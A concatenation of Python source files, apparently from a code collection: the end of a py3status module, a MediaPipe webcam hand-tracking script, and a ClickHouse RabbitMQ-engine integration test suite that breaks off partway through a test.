"cached_until": self.py3.CACHE_FOREVER,
}
# Cache forever unless in check_pid mode
if self.check_pid:
response["cached_until"] = self.py3.time_in(self.cache_timeout)
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
detect_hands.py
|
import cv2
import numpy as np
import mediapipe as mp
import time
import threading
class HandDetector():
def __init__(self, static_mode = False, maxHands = 2, complexity=1, detectionCon = 0.5, trackCon = 0.5):
self.static_mode = static_mode
self.maxHands = maxHands
self.complexity = complexity
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(static_image_mode=self.static_mode,
max_num_hands=self.maxHands,
model_complexity=self.complexity,
min_detection_confidence=self.detectionCon,
min_tracking_confidence=self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
self.landmarks = None
self.stop_event = threading.Event()
self.image = None
self.hand_center = (None, None)
self.hand_image = None
def findHands(self, img, draw=True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo = 0, draw=True):
lmlist = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
lmlist.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 3, (255, 0, 255), cv2.FILLED)
self.landmarks = lmlist
return lmlist
def findCenter(self, img, lmlist, draw=True):
center_x, center_y = None, None
if len(lmlist) != 0:
center_x = 0
center_y = 0
for lm in lmlist:
center_x += lm[1]
center_y += lm[2]
center_x = int(center_x / len(lmlist))
center_y = int(center_y / len(lmlist))
if draw:
cv2.circle(img, (center_x, center_y), 10, (0, 255, 0), cv2.FILLED)
return (center_x, center_y)
def detect(self):
while not self.stop_event.is_set():
frame = self.image.copy()
frame = self.findHands(frame)
lmlist = self.findPosition(frame, draw=False)
self.hand_center = self.findCenter(frame, lmlist)
self.hand_image = frame
def start(self):
self.stop_event.clear()
self.thread = threading.Thread(target=self.detect, args=())
self.thread.start()
def stop(self):
self.stop_event.set()
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0, cv2.CAP_V4L2)
cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
detector = HandDetector(static_mode=False, complexity=1)
while True:
success, img = cap.read()
img = np.array(img[:, ::-1]) # Flip
img = detector.findHands(img)
lmlist = detector.findPosition(img, draw=False)
center = detector.findCenter(img, lmlist)
image_center = np.array(img.shape[:2]) / 2
print(f"Hand Center: {center}, Image center: {image_center}")
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(round(fps, 2)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)
cv2.imshow("Image", img)
if cv2.waitKey(1) == ord('q'):
break
if __name__ == '__main__':
main()
|
test.py
|
import json
import os.path as p
import random
import subprocess
import threading
import logging
import time
from random import randrange
import pika
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from . import rabbitmq_pb2
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/rabbitmq.xml', 'configs/log_conf.xml'],
with_rabbitmq=True)
# Helpers
def rabbitmq_check_result(result, check=False, ref_file='test_rabbitmq_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def kill_rabbitmq(rabbitmq_id):
p = subprocess.Popen(('docker', 'stop', rabbitmq_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def revive_rabbitmq(rabbitmq_id):
p = subprocess.Popen(('docker', 'start', rabbitmq_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
# Fixtures
@pytest.fixture(scope="module")
def rabbitmq_cluster():
try:
cluster.start()
logging.debug("rabbitmq_id is {}".format(instance.cluster.rabbitmq_docker_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def rabbitmq_setup_teardown():
print("RabbitMQ is available - running test")
yield # run test
instance.query('DROP TABLE IF EXISTS test.rabbitmq')
# Tests
def test_rabbitmq_select(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'select',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
'''.format(rabbitmq_cluster.rabbitmq_host))
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='select', routing_key='', body=message)
connection.close()
# The order of messages in select * from test.rabbitmq is not guaranteed, so sleep to collect everything in one select
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_select_empty(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'empty',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
'''.format(rabbitmq_cluster.rabbitmq_host))
assert int(instance.query('SELECT count() FROM test.rabbitmq')) == 0
def test_rabbitmq_json_without_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'json',
rabbitmq_format = 'JSONEachRow'
'''.format(rabbitmq_cluster.rabbitmq_host))
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='json', routing_key='', body=message)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='json', routing_key='', body=message)
connection.close()
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_csv_with_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'csv',
rabbitmq_format = 'CSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='csv', routing_key='', body=message)
connection.close()
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_tsv_with_delimiter(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'tsv',
rabbitmq_format = 'TSV',
rabbitmq_queue_base = 'tsv',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='tsv', routing_key='', body=message)
connection.close()
result = ''
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_materialized_view(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mv', routing_key='', body=message)
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if (rabbitmq_check_result(result)):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close()
rabbitmq_check_result(result, True)
def test_rabbitmq_materialized_view_with_subquery(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mvsq',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.rabbitmq);
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mvsq', routing_key='', body=message)
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close()
rabbitmq_check_result(result, True)
def test_rabbitmq_many_materialized_views(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mmv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.rabbitmq;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mmv', routing_key='', body=message)
while True:
result1 = instance.query('SELECT * FROM test.view1 ORDER BY key')
result2 = instance.query('SELECT * FROM test.view2 ORDER BY key')
if rabbitmq_check_result(result1) and rabbitmq_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
connection.close()
rabbitmq_check_result(result1, True)
rabbitmq_check_result(result2, True)
@pytest.mark.skip(reason="clichouse_path with rabbitmq.proto fails to be exported")
def test_rabbitmq_protobuf(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value String)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'pb',
rabbitmq_format = 'Protobuf',
rabbitmq_schema = 'rabbitmq.proto:KeyValueProto';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
data = ''
for i in range(0, 20):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
data = ''
for i in range(20, 21):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
data = ''
for i in range(21, 50):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
connection.close()
result = ''
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
rabbitmq_check_result(result, True)
def test_rabbitmq_big_message(rabbitmq_cluster):
# Create batchs of messages of size ~100Kb
rabbitmq_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(rabbitmq_messages)]
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value String)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'big',
rabbitmq_format = 'JSONEachRow';
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
for message in messages:
channel.basic_publish(exchange='big', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == batch_messages * rabbitmq_messages:
break
connection.close()
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == rabbitmq_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_sharding_between_queues_publish(rabbitmq_cluster):
NUM_CONSUMERS = 10
NUM_QUEUES = 10
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'test_sharding',
rabbitmq_num_queues = 10,
rabbitmq_num_consumers = 10,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _channel_id AS channel_id FROM test.rabbitmq;
''')
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
current = 0
for message in messages:
current += 1
mes_id = str(current)
channel.basic_publish(exchange='test_sharding', routing_key='',
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.view")
for thread in threads:
thread.join()
assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
assert int(result2) == 10
def test_rabbitmq_mv_combo(rabbitmq_cluster):
NUM_MV = 5
NUM_CONSUMERS = 4
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'combo',
rabbitmq_queue_base = 'combo',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 5,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
for mv_id in range(NUM_MV):
instance.query('''
DROP TABLE IF EXISTS test.combo_{0};
DROP TABLE IF EXISTS test.combo_{0}_mv;
CREATE TABLE test.combo_{0} (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.combo_{0}_mv TO test.combo_{0} AS
SELECT * FROM test.rabbitmq;
'''.format(mv_id))
time.sleep(2)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='combo', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = 0
for mv_id in range(NUM_MV):
result += int(instance.query('SELECT count() FROM test.combo_{0}'.format(mv_id)))
if int(result) == messages_num * threads_num * NUM_MV:
break
time.sleep(1)
for thread in threads:
thread.join()
for mv_id in range(NUM_MV):
instance.query('''
DROP TABLE test.combo_{0}_mv;
DROP TABLE test.combo_{0};
'''.format(mv_id))
assert int(result) == messages_num * threads_num * NUM_MV, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_insert(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'insert',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert1',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
consumer_connection = pika.BlockingConnection(parameters)
consumer = consumer_connection.channel()
result = consumer.queue_declare(queue='')
queue_name = result.method.queue
consumer.queue_bind(exchange='insert', queue=queue_name, routing_key='insert1')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
insert_messages = []
def onReceived(channel, method, properties, body):
i = 0
insert_messages.append(body.decode())
if (len(insert_messages) == 50):
channel.stop_consuming()
consumer.basic_consume(onReceived, queue_name)
consumer.start_consuming()
consumer_connection.close()
result = '\n'.join(insert_messages)
rabbitmq_check_result(result, True)
def test_rabbitmq_insert_headers_exchange(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'insert_headers',
rabbitmq_exchange_type = 'headers',
rabbitmq_routing_key_list = 'test=insert,topic=headers',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
consumer_connection = pika.BlockingConnection(parameters)
consumer = consumer_connection.channel()
result = consumer.queue_declare(queue='')
queue_name = result.method.queue
consumer.queue_bind(exchange='insert_headers', queue=queue_name, routing_key="",
arguments={'x-match': 'all', 'test': 'insert', 'topic': 'headers'})
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
insert_messages = []
def onReceived(channel, method, properties, body):
i = 0
insert_messages.append(body.decode())
if (len(insert_messages) == 50):
channel.stop_consuming()
consumer.basic_consume(onReceived, queue_name)
consumer.start_consuming()
consumer_connection.close()
result = '\n'.join(insert_messages)
rabbitmq_check_result(result, True)
def test_rabbitmq_many_inserts(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_many;
DROP TABLE IF EXISTS test.rabbitmq_consume;
DROP TABLE IF EXISTS test.view_many;
DROP TABLE IF EXISTS test.consumer_many;
CREATE TABLE test.rabbitmq_many (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_inserts',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert2',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.rabbitmq_consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'many_inserts',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'insert2',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
messages_num = 10000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
def insert():
while True:
try:
instance.query("INSERT INTO test.rabbitmq_many VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query('''
CREATE TABLE test.view_many (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
SELECT * FROM test.rabbitmq_consume;
''')
for thread in threads:
thread.join()
while True:
result = instance.query('SELECT count() FROM test.view_many')
if int(result) == messages_num * threads_num:
break
time.sleep(1)
instance.query('''
DROP TABLE test.rabbitmq_consume;
DROP TABLE test.rabbitmq_many;
DROP TABLE test.consumer_many;
DROP TABLE test.view_many;
''')
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_overloaded_insert(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view_overload;
DROP TABLE IF EXISTS test.consumer_overload;
DROP TABLE IF EXISTS test.rabbitmq_consume;
CREATE TABLE test.rabbitmq_consume (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'over',
rabbitmq_queue_base = 'over',
rabbitmq_exchange_type = 'direct',
rabbitmq_num_consumers = 5,
rabbitmq_num_queues = 10,
rabbitmq_max_block_size = 10000,
rabbitmq_routing_key_list = 'over',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.rabbitmq_overload (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'over',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'over',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view_overload (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
SELECT * FROM test.rabbitmq_consume;
''')
messages_num = 100000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq_overload VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 5
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view_overload')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer_overload;
DROP TABLE test.view_overload;
DROP TABLE test.rabbitmq_consume;
DROP TABLE test.rabbitmq_overload;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_direct_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
''')
num_tables = 5
for consumer_id in range(num_tables):
print(("Setting up table {}".format(consumer_id)))
instance.query('''
DROP TABLE IF EXISTS test.direct_exchange_{0};
DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
CREATE TABLE test.direct_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 2,
rabbitmq_exchange_name = 'direct_exchange_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'direct_{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.direct_exchange_{0}_mv TO test.destination AS
SELECT key, value FROM test.direct_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "direct_" + str(key_num)
key_num += 1
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(
exchange='direct_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE test.direct_exchange_{0}_mv;
DROP TABLE test.direct_exchange_{0};
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_fanout_exchange(rabbitmq_cluster):
instance.query('''
